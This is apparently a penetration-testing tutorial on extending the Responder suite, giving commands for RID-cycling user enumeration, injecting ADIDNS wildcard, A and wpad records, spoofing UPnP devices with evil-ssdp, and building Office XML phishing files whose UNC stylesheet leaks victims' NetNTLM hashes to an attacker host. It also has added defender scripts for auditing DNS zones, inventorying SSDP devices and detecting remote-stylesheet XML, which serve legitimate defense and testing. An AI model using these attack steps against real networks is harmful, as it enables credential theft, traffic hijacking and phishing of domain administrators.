In the previous two articles in this series we covered
various ideas and theories on how to expand and utilise the entire Responder
suite. This article is going to focus on expanding the suite further with a
focus on practical usages for your penetration tests. If you have not already
read the previous two articles in the series, you can find them on this website. I strongly advise
that you read these two articles before this one, as this article assumes the
knowledge contained within them.
Practical Applications – Identifying Targets
The primary difficulty with using MultiRelay is identifying admin users and
capturing their hashes. MultiRelay does accept an "ALL" target parameter, but
if you rely on it while using the techniques below it will most likely generate
a large amount of failed-login noise on the network. RIDRelay, created by
skorov, lets us enumerate every user on a domain through RID cycling, using the
same hash-passing (relayed authentication) approach covered in the previous
articles. The resulting user list helps us find admin users and other targets,
and no privileges are required.
To run the tool, start it with ridrelay.py -t <target>, where the target
parameter is a host on the domain. The -o parameter writes the enumerated
usernames to a file.
Example command: python ridrelay.py -t 192.168.1.11 -o output.txt
The final step in the process is to get a user on the domain
to connect to the SMB server within RIDRelay. To do this you can use any of the
methods mentioned in the previous articles or one of the methods introduced
below. Make sure that you turn off the SMB server in Responder temporarily if
you started Responder before RIDRelay, or it will fail to bind to the necessary
ports.
Practical Applications – ADIDNS
Since this method's history and technical background is so
beautifully explained in this article: https://blog.netspi.com/exploiting-adidns/,
we will only cover the basic practical usage of the tool. If you want to learn
how this tool works and its history, please go and read the aforementioned
article.
By sending dynamic DNS updates we are able to insert DNS records into ADIDNS
whenever the zone is using the default secure dynamic updates setting. With the
tool linked below you can insert various records using the following commands:
Run this first:
Import-Module $PWD\Invoke-DNSUpdate.ps1
Import-Module $PWD\Powermad.ps1
Invoke-DNSUpdate -DNSType <type> -DNSName <subdomain/FQDN> -DNSData <destination>
Example: Invoke-DNSUpdate -DNSType A -DNSName smb.domain.local -DNSData 192.168.1.11
By inserting a new A record into ADIDNS we can re-route traffic intended for a major SMB server on the network to our own Responder server. It is also possible to add a wildcard record, which is returned as a fallback answer for every DNS query that does not match an existing name in the zone. This behaves much like LLMNR/NBNS spoofing but may be available when those protocols are not. You can also exploit WPAD through Responder, even when LLMNR and wildcard additions are not available, by adding a wpad record to the DNS zone.
Example wildcard record: New-ADIDNSNode -Node *
There are some limitations on which records you can and cannot add, discussed
in the article above; in essence, you cannot edit existing DNS records but you
can add new ones.
The download for this tool can be found on its GitHub page
here: https://github.com/Kevin-Robertson/Powermad
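As an added example (not part of the original post and not code from Powermad), the following PowerShell audit is what a defender would run against the zone to surface the record types described above. It assumes the DnsServer RSAT module, read access to the zone, and the placeholder values $ZoneName and $DnsServer.

```powershell
# Added audit script; it is not from the article or from Powermad. Requires the DnsServer RSAT
# module and read access to the zone. $ZoneName and $DnsServer are placeholder values.
param(
    [string]$ZoneName  = 'domain.local',      # placeholder zone name
    [string]$DnsServer = 'dc01.domain.local'  # placeholder DNS server, normally a DC
)

$zone    = Get-DnsServerZone -Name $ZoneName -ComputerName $DnsServer
$records = Get-DnsServerResourceRecord -ZoneName $ZoneName -ComputerName $DnsServer
$gqbl    = Get-DnsServerGlobalQueryBlockList -ComputerName $DnsServer

function Get-RecordValue($r) {
    # Pull the human-readable payload for the record types the section mentions.
    switch ($r.RecordType) {
        'A'     { $r.RecordData.IPv4Address.ToString() }
        'AAAA'  { $r.RecordData.IPv6Address.ToString() }
        'CNAME' { $r.RecordData.HostNameAlias }
        default { $r.RecordType }
    }
}

# Secure dynamic update is what lets any authenticated account create new nodes in the zone.
"Zone {0}: DynamicUpdate={1} DsIntegrated={2}" -f $zone.ZoneName, $zone.DynamicUpdate, $zone.IsDsIntegrated

# 1. Wildcard node: answers every name the zone does not otherwise contain, the ADIDNS stand-in
#    for LLMNR/NBNS spoofing. A production AD zone almost never has a legitimate one.
foreach ($r in @($records | Where-Object { $_.HostName -eq '*' })) {
    "FINDING wildcard {0} -> {1}" -f $r.RecordType, (Get-RecordValue $r)
}

# 2. wpad / isatap nodes are only answered if the Global Query Block List no longer covers them,
#    so report the node together with the list state.
foreach ($r in @($records | Where-Object { $_.HostName -in @('wpad', 'isatap') })) {
    $shielded = $gqbl.Enable -and ($gqbl.List -contains $r.HostName)
    "FINDING {0} {1} -> {2} (shielded by GQBL: {3})" -f $r.HostName, $r.RecordType, (Get-RecordValue $r), $shielded
}

# 3. Dynamic records carry a Timestamp, static ones do not; list A records added in the last day
#    so new names that are not known hosts or DHCP leases can be checked against change records.
$records |
    Where-Object { $_.RecordType -eq 'A' -and $_.Timestamp -and $_.Timestamp -gt (Get-Date).AddDays(-1) } |
    Select-Object HostName, Timestamp, @{ n = 'IPv4'; e = { $_.RecordData.IPv4Address.ToString() } } |
    Sort-Object Timestamp -Descending | Format-Table -AutoSize
```

Any wildcard or wpad finding, or a timestamped record whose name you cannot tie to a known host, is worth matching against the DNS server's audit log before it is removed.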
Practical Applications – SSDP
Another excellent tool which can help you exploit a Windows network is
evil-ssdp. This tool uses SSDP spoofing to advertise a fake UPnP device, which
then appears in users' Windows Explorer windows. When a user clicks on one of
these fake UPnP devices they can be redirected to malicious web pages which
allow you to grab their NetNTLM hash. As an interesting secondary capability,
the tool can also identify XML-related vulnerabilities in various applications.
Evil-ssdp can be executed by running the following:
essdp.py <interface> -t <template file>
Example: essdp.py eth0 -t Microsoft-azure
After running this command, Windows devices on your local network will begin
to detect your fake UPnP device and will display it to users. If a user clicks
on the device, the page served by evil-ssdp will make the user's machine
attempt an SMB connection back to your attacking machine. To intercept this and
grab hashes or execute a hash-passing attack, make sure you are running
Responder as discussed in the previous articles. This will only work in old
browsers that still follow file:// links. The phishing functionality, which is
shown below, works in all browsers.
If you wish to maximise the effectiveness of this tool, I
highly recommend creating your own template file to mimic the environment a user
would normally see when visiting an internal website. A section on creating
your own templates can be found towards the bottom of the Gitlab page, which
can be found here: https://gitlab.com/initstring/evil-ssdp
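As an added example (not part of the original post and not code from evil-ssdp), the following PowerShell inventory is the check a defender can run from any host on the segment: it issues a standard SSDP M-SEARCH, pulls each responder's device description and presentation page, and reports any file:// or UNC references on that page, which is the mechanism described above. The function name and the timeout value are my own choices.

```powershell
# Added inventory script; it is not from the article or from evil-ssdp. It sends a standard
# SSDP M-SEARCH, fetches each responder's device description and then its presentation page,
# and reports any file:// or UNC references on that page. Run it from a host on the LAN segment.
function Get-SsdpDevices {
    param([int]$TimeoutMs = 3000)
    $search = "M-SEARCH * HTTP/1.1`r`nHOST: 239.255.255.250:1900`r`nMAN: `"ssdp:discover`"`r`nMX: 2`r`nST: ssdp:all`r`n`r`n"
    $udp = New-Object System.Net.Sockets.UdpClient
    $udp.Client.ReceiveTimeout = $TimeoutMs
    $group = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse('239.255.255.250'), 1900)
    $bytes = [System.Text.Encoding]::ASCII.GetBytes($search)
    [void]$udp.Send($bytes, $bytes.Length, $group)
    $from = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any, 0)
    $seen = @{}
    try {
        while ($true) {
            $reply = [System.Text.Encoding]::ASCII.GetString($udp.Receive([ref]$from))
            $loc = [regex]::Match($reply, '(?im)^LOCATION:\s*(\S+)').Groups[1].Value
            if (-not $loc -or $seen.ContainsKey($loc)) { continue }
            $seen[$loc] = $true
            $dev = $null; $refs = @()
            try {
                # Device description: this is what populates the entry in Explorer's Network view.
                $dev = ([xml](Invoke-WebRequest -Uri $loc -UseBasicParsing -TimeoutSec 3).Content).root.device
                $pres = $null
                if ($dev.presentationURL -and [uri]::TryCreate([uri]$loc, [string]$dev.presentationURL, [ref]$pres)) {
                    # Presentation page: where a user lands after double-clicking the device.
                    $html = (Invoke-WebRequest -Uri $pres -UseBasicParsing -TimeoutSec 3).Content
                    $refs = @([regex]::Matches($html, '(?i)file://\S+|\\\\[\w.-]+\\\S+') | ForEach-Object { $_.Value })
                }
            } catch { }   # unreachable or non-UPnP location: still report the responder
            [pscustomobject]@{
                Responder     = $from.Address.ToString()
                Location      = $loc
                FriendlyName  = $dev.friendlyName
                Manufacturer  = $dev.manufacturer
                Presentation  = $dev.presentationURL
                FileOrUncRefs = ($refs -join ' ')
            }
        }
    } catch { }   # the receive timeout ends the sweep
    finally { $udp.Close() }
}

Get-SsdpDevices | Format-Table -AutoSize
```

Compare the Responder and Location columns against the devices you expect on that segment; a responder that is a general-purpose host, or any non-empty FileOrUncRefs column, is the thing to investigate.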
Practical Applications – XML Office Files
This method is discussed in detail in this post here: https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/
This attack method can be used very effectively in an email
phishing campaign against a domain, especially when targeted at admin users
identified by RIDRelay. To create an XML file which will send the reader's hash
to your Responder instance create the following XML file in a text editor:
<?xml version="1.0" encoding="utf-8"?>
<?mso-application progid="Word.Document"?>
<?xml-stylesheet type="text/xsl" href="\\<Your Responder IP>\directory\file.xsl"?>
If you wish to add content to the Word document to make it look legitimate,
you can first generate the document in Word and save it as an XML file via the
Save As menu. After doing this, insert the third line of the XML above (the
xml-stylesheet line) at the top of your XML file. This method works with
multiple types of Office document, including Excel spreadsheets. When your
victim opens the file they will be prompted to select an Office application to
open it with if they have not opened an Office XML file before. If the target
domain/host has a text editor assigned to open XML files by default, this
attack is unlikely to work.
For further information on this attack, I highly recommend
reading the article linked above.
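As an added example (not part of the original post or the linked article), the following PowerShell detection scans XML files for an xml-stylesheet processing instruction whose href points off the machine, which is the pattern the section above relies on. The function name, the temp directory, the two sample files and the 192.0.2.10 address are constructed for this demonstration.

```powershell
# Added detection script; it is not from the article or from the linked post. It scans .xml
# files for an xml-stylesheet processing instruction whose href leaves the machine. The two
# sample files, the 192.0.2.10 address and the temp directory are constructed for this demo.
function Find-RemoteStylesheetXml {
    param([Parameter(Mandatory)][string[]]$Path)
    foreach ($file in $Path) {
        # Work on raw text: the PI shown above is not even well-formed XML, yet Word honours it,
        # so a strict XML parser would reject exactly the documents we want to find.
        $text = Get-Content -LiteralPath $file -Raw -ErrorAction SilentlyContinue
        if (-not $text) { continue }
        $prolog = $text.Substring(0, [Math]::Min($text.Length, 4096))   # PIs precede the root element
        foreach ($pi in [regex]::Matches($prolog, '(?i)<\?xml-stylesheet\b([^?]*)\?>')) {
            $m = [regex]::Match($pi.Groups[1].Value, '(?i)href\s*=\s*(?:"([^"]*)"|''([^'']*)''|([^\s?]+))')
            if (-not $m.Success) { continue }
            $href = @($m.Groups[1].Value, $m.Groups[2].Value, $m.Groups[3].Value) | Where-Object { $_ } | Select-Object -First 1
            # A UNC path (\\host\share or //host/share) makes Office authenticate to 'host' before the
            # document is rendered; http(s) and file: URLs can be pointed at the same place.
            if ($href -match '^(\\\\|//|https?://|file:)') {
                [pscustomobject]@{
                    File      = $file
                    Href      = $href
                    Target    = ((($href -replace '^(\\\\|//|https?://|file:/*)', '') -split '[\\/]') | Select-Object -First 1)
                    MsoProgId = [regex]::Match($prolog, '(?i)<\?mso-application\s+progid="([^"]*)"').Groups[1].Value
                }
            }
        }
    }
}

# Constructed samples: one shaped like the document above, one with a harmless local stylesheet.
$tmp = Join-Path $env:TEMP 'xsl-scan-demo'
New-Item -ItemType Directory -Path $tmp -Force | Out-Null
@'
<?xml version="1.0" encoding="utf-8"?>
<?mso-application progid="Word.Document"?>
<?xml-stylesheet type="text/xsl" href=\\192.0.2.10\share\file.xsl?>
<w:wordDocument xmlns:w="http://schemas.microsoft.com/office/word/2003/wordml"/>
'@ | Set-Content -Path (Join-Path $tmp 'suspect.xml')
@'
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="report.xsl"?>
<report/>
'@ | Set-Content -Path (Join-Path $tmp 'benign.xml')

Find-RemoteStylesheetXml -Path (Get-ChildItem -Path $tmp -Filter *.xml).FullName | Format-Table -AutoSize
```

Only suspect.xml is reported, with Target 192.0.2.10 and MsoProgId Word.Document; pointed at a mail quarantine or a file share, the same function gives you the host each document would authenticate to.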
Summary
Thank you for reading my practical guide to Responder, which builds upon my
previous two guides on Intermediate and Advanced usage of the tool. If I find
more ways to utilise the Responder suite in the future, I will publish another
article discussing them. Responder is an extremely flexible tool, not just a
niche attack for LLMNR/NBNS spoofing, and as such I highly recommend that you
seek out your own methods to expand your suite as well.